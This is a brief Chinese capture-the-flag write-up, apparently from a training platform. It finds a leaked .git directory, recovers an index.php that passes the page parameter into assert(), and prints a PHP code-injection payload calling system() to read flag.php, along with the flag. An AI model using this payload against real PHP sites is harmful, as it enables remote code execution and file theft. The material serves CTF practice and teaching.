目录
题目场景
?
查看about
?
查看源码
在源码第29行发现了线索
?
查看.git
怀疑是git代码泄露
?
GitHack扫描
?
查看生成的index.php
<?php
if (isset($_GET['page'])) {
????$page = $_GET['page'];
} else {
????$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
?
分析代码
若想得到flag,即得到"Detected hacking attempt!"
?page=abc') or system("cat templates/flag.php");//
找到flag
cyberpeace{bca4cbeba9a8210128e7542462a2e7d0}